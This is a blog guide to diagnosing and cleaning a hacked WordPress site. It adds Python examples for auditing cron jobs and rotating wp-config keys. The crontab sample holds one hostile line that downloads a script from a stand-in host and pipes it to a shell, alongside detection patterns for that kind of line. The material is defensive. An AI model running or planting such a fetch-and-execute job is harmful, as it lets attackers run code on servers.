More often than not, I get to read some data loss horror story from WordPress users. “I was about to publish an article when my website crashed — I was unable to log in! Now I can’t get my data back no matter how hard I try!” Or, more relevant to WordPress, “I was scrolling through my site logs when I noticed an unusual traffic spike or an overwhelming amount of spam content.” These are pretty obvious signs of a hacked website, and something needs to be done about it.
Sometimes people report spam links being added to their content without their consent. If you ever face any such signs, that would mean your site was hacked, and you need to fix it. That’s what this post is about. I am going to talk about certain steps that you can take to fix a hacked site. Let’s get started.
Hacking Is So Mainstream
The concept of hacking is not something new. How many of you have ever password-protected a computer to restrict young siblings from using it? And, how many of you have guessed the password and successfully plunged into the same old computer that you have completely forgotten about? I assume the answer to both these questions is: "Probably on more than one occasion." Right?
This is a minor form of hacking, though it lacks the purpose of harming anyone.
More Benefit in Staying Hidden
Gone are the days when hacking was only about getting and modifying login credentials. Earlier, if you failed to log in to your online account, you assumed you had been hacked. Today, however, hackers stay somewhat patient: they begin by infecting a site and then spread that malware to users and even to other servers. There’s less benefit to them if the person being hacked knows they’re hacked.
That’s why hackers try to stay hidden, and even when it is about cracking passwords, they instigate a malicious data dump, in which vast swathes of data are dumped into a file, which could do more harm than ever. All I am trying to say here is that having hacked a site is not the prime goal of hackers anymore.
They build automated scripts, which help them hack a number of servers, users and sites at the same time. Then they choose to stay hidden as long as they can, to harvest as much value as they can. I'm sure no one would ever want to be in this boat. That’s what we have got to fix.
Things to Know Before Getting Started
It still scares me to death whenever I am notified about any malicious activity on any of my sites, through an email. What most of the users do in such situations is to contact their web hosts. But, web hosts rarely offer the kind of support which they need and expect during such conditions.
Don't think of me as a nagging customer who is not satisfied with his hosting provider and is looking for a new web host. What I mean here is that you cannot always rely on your host to protect your websites, especially one which has other priorities as a business, i.e. hosting. In-house efforts are to be made as well.
It’s disheartening to become a victim of any hacking. It affects your business both monetarily and socially. Hacking is not only about losing a website. You lose your data, visitors, rankings, and even trust.
Imagine you run an online store with a database of more than 10,000 customers. This means that the very least you should protect for every customer is their credit card details. If such a website gets hacked, then you are doomed. It has more far-reaching effects than one could imagine. But if the same hacking attempt is made on a regular blog with 10,000 monthly page views, then the site owner has somewhat little to lose. But this is no way to justify the act of hacking a website. An ordinary blog is just as important as an eCommerce site.
Hacking is Curable
Over the past few years, several thousands of WordPress sites were hacked. But how many of these actually recovered from it? I know of many users who have recovered their hacked WordPress sites. That’s good to know. If you are hacked, you can still recover.
Still, many beginners prefer deleting the entire website instead of fixing it, on the grounds that they are too inexperienced to handle this technical mumbo jumbo. Thus, they opt for an easy escape, which is severely off-putting for me. So, the first thing you need to realize is:
If you are running WordPress and you have been hacked, Don’t Panic. It can be fixed!
This is a complete beginner's guide in which you are going to learn about fixing a WordPress site if it has been hacked and infected with malicious code, spam, backdoors, malware or other vulnerabilities.
I will describe robust tools which not only clean your website but also restore it effectively. The guide is a culmination of all the techniques which I have mentioned throughout this WordPress security series. So, do take a look at the other articles of this series as well. Let's begin!
Is Your Website Really Being Hacked?
Someone who is running a small business or even a simple blog will find themselves wondering, “Why me?” “Why on earth would any hacker want to spend their valuable time trying to hack my website?” It turns out that there are various reasons for it. Mostly, it is because hackers these days hack any site with known vulnerabilities and do it in the form of a bulk hack with automated scripts and scrapers.
It is very important to confirm that your website really is hacked. Panicking over stuff like spam comments, repetitive login attempts, etc. may put you through a lot of hassle. Despite all the smart moves, it isn’t that hard to find out whether your site is hacked or not. Here are a few symptoms through which you can tell that a WordPress site was hacked.
Your site has been hacked if:
- Spam content appears in the site header and footer which redirects users to things like illegal services, bad neighborhood websites, drugs, etc.
- Your site visitors complain about getting spam content. This is an even more severe case, where your users are being targeted directly.
- Your web host notifies you about malicious activity, e.g. spam emails with links to your website.
- Core file modifications are observed. Files like .htaccess normally contain the modified code. This is only possible to detect if you’re a developer or if you know what you are looking for.
- You get blacklist warnings by Google, Bing, McAfee, etc.
- You detect new site visitors from unusual parts of the world. E.g. if your normal site visitors are from the US and you suddenly get a lot of visitors from the African part of the globe, it means something suspicious is happening.
- You are unable to log in to your WordPress account.
All these symptoms point to one common conclusion, i.e. your site has been hacked or is about to get hacked. It can take quite a bit of time to clean up the mess that may have been there long before you discovered it. So, let's go through a step-by-step approach to fixing your hacked WordPress site.
Identify the Nature of Hack
Security should be a top priority, and if your website is hacked, it must be handled with great patience. First of all, you must identify how far the hacking attempt has gone. Sometimes a hacker has only managed to breach the initial layers of security, or might have gone far enough to get complete control of your site.
So, examining the situation at hand is fundamentally important. Doing this will let you fix the hack by moving in the right direction. You must try logging in to your WordPress admin panel, check for the presence of any spam links, check whether Google has marked the website as insecure, etc.
If you can still log in to your account, then an immediate action would be changing the username and password. You should also consider updating your Salts.
This would put a stop to any further malicious activity. However, if severe damage has been caused then preventive steps should be taken accordingly which I intend to explain shortly.
You Need Professional Assistance
Trust me when I say that hackers are evil geniuses who inject malicious code which is hidden at various locations. So, if you aren't a code nerd, then things can get pretty complicated pretty quickly. You cannot find this obscured code and in this case, I would never recommend toying around with the PHP files on your own. It's always wise for beginners to seek help from a professional.
The WordPress community is filled with security experts and solution providers who fix hacked websites. They offer their services at quite nominal charges which a beginner can easily afford. However, if you are looking for the prominent names for this deal, then Sucuri Security leads the race. They clean and repair hacked websites. So, if you are not tech-savvy or want to stay at peace, then Sucuri can be trusted without any doubt.
Onboard Your Web Host
Onboarding a secure web host is the first step towards site security. Almost every hosting company claims to offer the best server administration, price, and add-ons but ultimately fails if their services aren't safe to use. Hackers often schedule a job in the background to re-infect the website. An effective host will detect all these unusual jobs.
Just scroll through the CRON jobs on your server or in your hosting environment and check that nothing is scheduled that you are unaware of. This is a precautionary measure which helps prevent a hacking attempt. Prominent hosting providers offer the option of a CRON scheduler in cPanel from where you can periodically check to make sure nothing has been altered.
Similarly, a good host will always extend its support in the wake of a hacking attempt. Not only this, they also notify you about malicious activity well in time and might clean up the hack for you on their own.
But if your website is hacked, then you should contact your web host immediately and follow their instructions. Onboard them to the problems you are facing; that is, your host should be informed at the earliest. They have a complete team of experts and professionals who can help you with both the basic and additional information about the hack, e.g. how much damage is caused? What was the reason behind the hack? Where is the backdoor hiding?
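One way to do that review on a crontab saved as text, as an added example that is not part of the original article: the script lists every job that is not in your own list of known jobs and notes patterns worth a closer look. The sample crontab, the known-jobs list and the heuristics are constructed assumptions.

```python
import re

# Heuristics worth a closer look (assumed for this example, not exhaustive).
SUSPICIOUS = {
    "download piped to an interpreter":
        re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|php|python\d?)\b"),
    "decodes an encoded payload":
        re.compile(r"base64\s+(-d|--decode)|base64_decode"),
    "runs a file from a writable directory":
        re.compile(r"/(wp-content/uploads|tmp|dev/shm)/"),
}
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")  # e.g. MAILTO=...

def parse_crontab(text):
    """Yield (line_no, schedule, command) for each job in a user crontab."""
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        # "@reboot cmd" has one schedule field, a normal job has five.
        n_sched = 1 if line.startswith("@") else 5
        fields = line.split(None, n_sched)
        command = fields[n_sched] if len(fields) > n_sched else ""
        yield no, " ".join(fields[:n_sched]), command

def audit_crontab(text, known_commands):
    """Return [(line_no, command, reasons)] for jobs that need review."""
    findings = []
    for no, _schedule, command in parse_crontab(text):
        reasons = [why for why, rx in SUSPICIOUS.items() if rx.search(command)]
        if command not in known_commands:
            reasons.insert(0, "not in your list of known jobs")
        if reasons:
            findings.append((no, command, reasons))
    return findings

# Constructed sample: output of `crontab -l` saved as text.
SAMPLE = """\
# constructed sample crontab
MAILTO=admin@example.com
0 3 * * * /usr/bin/php /var/www/site/wp-cron.php
*/10 * * * * /usr/bin/php /var/www/site/wp-content/uploads/2019/cache.php
@reboot curl -s http://host.invalid/u | sh
"""
KNOWN = {"/usr/bin/php /var/www/site/wp-cron.php"}  # jobs you set up yourself

if __name__ == "__main__":
    for no, command, reasons in audit_crontab(SAMPLE, KNOWN):
        print(f"line {no}: {command}\n    -> " + "; ".join(reasons))
```

A job that shows up here is not proof of a hack; it is a job you should be able to explain before you leave it in place.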
Most of the hacks can easily be dealt with by restoring an old backup which didn’t have the malware and fixing the issue through which you got hacked in the first place.
By now, I am sure you know the importance of having backups for your sites. Backups solve a good deal of your problems if something goes wonky during an update or if your site gets hacked. Just restore a backup.
Backups function as site insurance. Without any stress, you can restore a site and get it back to normal working order. Having a good backup strategy is of core importance. There are a couple of go-to backup plugins which I’ve already discussed in my previous article.
You can schedule backups and keep a copy of it on the server or ship it off to an external destination e.g. Amazon S3, DropBox, Google Drive, FTP, and email. Likewise, your backup solution should run automatically at a frequency that suits the needs of your website.
While choosing a backup solution, make sure it does not exclude certain file types such as videos and archives. Since its launch, I’ve been an advocate of ManageWP Orion, which caters to the need of taking backups quite well.
Malware Scanning and Removal
A hacked website is never fixed if there remains even the tiniest bit of malware or a loophole that you didn’t remove. A complete cleansing of a website can only be ensured if it is scanned properly for the presence of any security threat. Scanning of a hacked WordPress site begins with the removal of inactive or useless themes and plugins because these are the favorite hideout for backdoors. Once you're done with this step, jump to the next level of scanning.
Obviously, you cannot check every component of a website. So, manual scanning is an absurd idea. From my experience, I'll recommend the Sucuri Security Scanner. They offer top notch scanning services for your hacked website. They check your site against a database of known problems to determine if it has been hacked. Then they run a complete analysis during which they look for viruses, spam, redirects and several other items to make sure that your site is fixed and safe to use.
Initially, they offer a free manual scan after which you can subscribe to their paid service as well. Apart from this, there are several free scanning plugins as well. I also recommend reading my article about Scanning Your WordPress Websites for Security Vulnerabilities.
Edit Your Security Keys and Salts
The inclusion of WordPress security keys and salts after version 3.1 offered a new trick to protect sites from brute force attacks. Likewise, the idea of changing the keys regularly can fix several hacked websites. Even if you have implemented all the solutions listed above, a hacker who has your login credentials still has control of your site. How? Because their cookies are still valid, they can remain logged in.
The only way of getting rid of this problem is to modify and update your keys and salts. You can generate a new set of WordPress keys and add them to your wp-config.php file. I have written a complete article featuring all the important points about keys and salts. Read it here: All You Need to Know About WordPress Security Keys and Salts.
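The key rotation described above, as an added example that is not part of the original article: it generates eight fresh random values and swaps them into the text of a wp-config.php, refusing to continue if any constant is missing. It assumes each constant sits in a standard single-line define() call; the sample config is constructed, and backing up and writing the real file is left to you.

```python
import re
import secrets
import string

# The eight key and salt constants WordPress reads from wp-config.php.
KEY_NAMES = ["AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT"]

# Printable characters that need no escaping in a single-quoted PHP string.
ALPHABET = "".join(
    c for c in string.ascii_letters + string.digits + string.punctuation
    if c not in "'\\")

def new_secret(length=64):
    """Return a random value from the OS's cryptographic random source."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

def rotate_keys(config_text):
    """Return (new_text, replaced_names); raise if any constant is missing."""
    replaced = []
    for name in KEY_NAMES:
        # Matches define('NAME', 'old value'); with either quote style.
        pattern = re.compile(
            r"define\(\s*(['\"])" + re.escape(name)
            + r"\1\s*,\s*(['\"]).*?\2\s*\)\s*;")
        line = "define( '%s', '%s' );" % (name, new_secret())
        # A function replacement keeps the new value from being read
        # as a regex template.
        config_text, count = pattern.subn(lambda m: line, config_text, count=1)
        if count:
            replaced.append(name)
    missing = [n for n in KEY_NAMES if n not in replaced]
    if missing:
        raise ValueError("not found in wp-config.php: " + ", ".join(missing))
    return config_text, replaced

# Constructed sample standing in for the contents of a real wp-config.php.
SAMPLE = ("<?php\n"
          + "".join("define( '%s', 'old-value-%d' );\n" % (n, i)
                    for i, n in enumerate(KEY_NAMES))
          + "$table_prefix = 'wp_';\n")

if __name__ == "__main__":
    new_text, names = rotate_keys(SAMPLE)
    print("rotated:", ", ".join(names))
```

Once the file with the new values is in place, every existing login cookie stops validating, so all users, including anyone holding a stolen session, have to log in again.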
Modifying User Permissions
Quite often, your website has multiple user accounts with different roles. The chances are that there is more than one administrator account as well. If your site is hacked, you must immediately go to the Users section to check for the presence of any new user account which you haven't added recently. If there is one, remove it quickly.
You can also remove all the other useless user accounts and get started from scratch. Or change the role of inactive users to “Subscriber”. You can add the authorized users once again after the site gets fixed.
Reset Login Credentials
After following all the steps mentioned above, it's time to reset your login credentials once again. By that I mean the username and password of every single thing, i.e. your dashboard, cPanel, MySQL, FTP, database, etc.
Hackers have developed a whole range of tools to get at your personal data. But a strong password is the main impediment which stands between your information and these infectious hacking tools.
So, reset the login credentials of every single user account. Instead of asking the users, change it yourself and let them know about the new passwords. I have repeatedly been highlighting the importance of strong usernames and passwords in WordPress. You must pay heed to its significance as well.
A handier approach in this respect is to reset all the user passwords by using the Sucuri plugin. You will find a section for Post-Hack settings from where you can click the Reset User’s Password tab to configure a new password. This sends temporary, strong passwords to all the authorized users through an email. Pretty handy eh?
Taking a Fresh Start
People say there is always a new beginning, and so is the case with hacked websites as well. Hacking is definitely a nightmare for every site owner but fighting this fear and coming out as a winner is a real deal. Running away and giving up should not be an option for you. If you have managed to fix a hacked website then kudos to you. Trust me you have done a brilliant job. But what's next?
Now this is your testing time. If you are thinking that you can sit back and relax after fixing a hacked site, then sadly you are wrong. You must learn from your mistakes and take a fresh start. You need to make darn sure your site doesn’t get hacked again. For that, you need to take the following preventive measures:
- Keep all your plugins and themes up to date. Make sure you run the recent version of WordPress every time.
- Use a reliable and secure web hosting. Instead of shared hosting, shift to managed WordPress hosting because it is safe to use.
- Use strong and unpredictable passwords.
- Limit the repetitive login attempts by installing a third party plugin.
- Install a reputable security plugin like iThemes Security and configure it properly.
- Block the attacks from reaching the server by installing a website firewall and monitoring system.
- Run regular scans on your WordPress site.
- Schedule regular backups with plugins like BackupBuddy.
- Get rid of all old WordPress installations lying around on your server.
- Finally, subscribe to a security solution provider which keeps an eye on your site security.
Wrapping Things Up!
The ultimate goal of taking all the WordPress security measures is to protect your website from being hacked. If you are reading this article, then it is possible that your site has never been hacked, or that it is hacked but you are unaware of it. There are several free online tools through which you can easily find out your site's vulnerability level. Another handy check for this purpose is to see whether your site is in Google's Safe Browsing List.
Visit Google’s Safe Browsing Status Checker and test your own site address.
The results contain detailed information on the current status of your site, why it is listed on Google’s malware list and what to do next. So, if these show any signs of hacking, then all the techniques mentioned above will be quite helpful for you.
To wrap up all the nitty-gritty steps mentioned above: to clean a hacked WordPress website, you begin with identifying the hack, then remove the malware and finally harden your site’s security for the future. I recommend consulting with a security geek.
Have you ever been a victim of a hacking attempt? How did you encounter that situation? What tools and techniques did you use? Share your story with us.
Finally, you can catch all of my articles on my profile page, and you can follow me or reach out on Twitter @mrahmadawais to discuss this article. As usual, don’t hesitate to leave any questions or comments below, and I’ll aim to respond to each of them.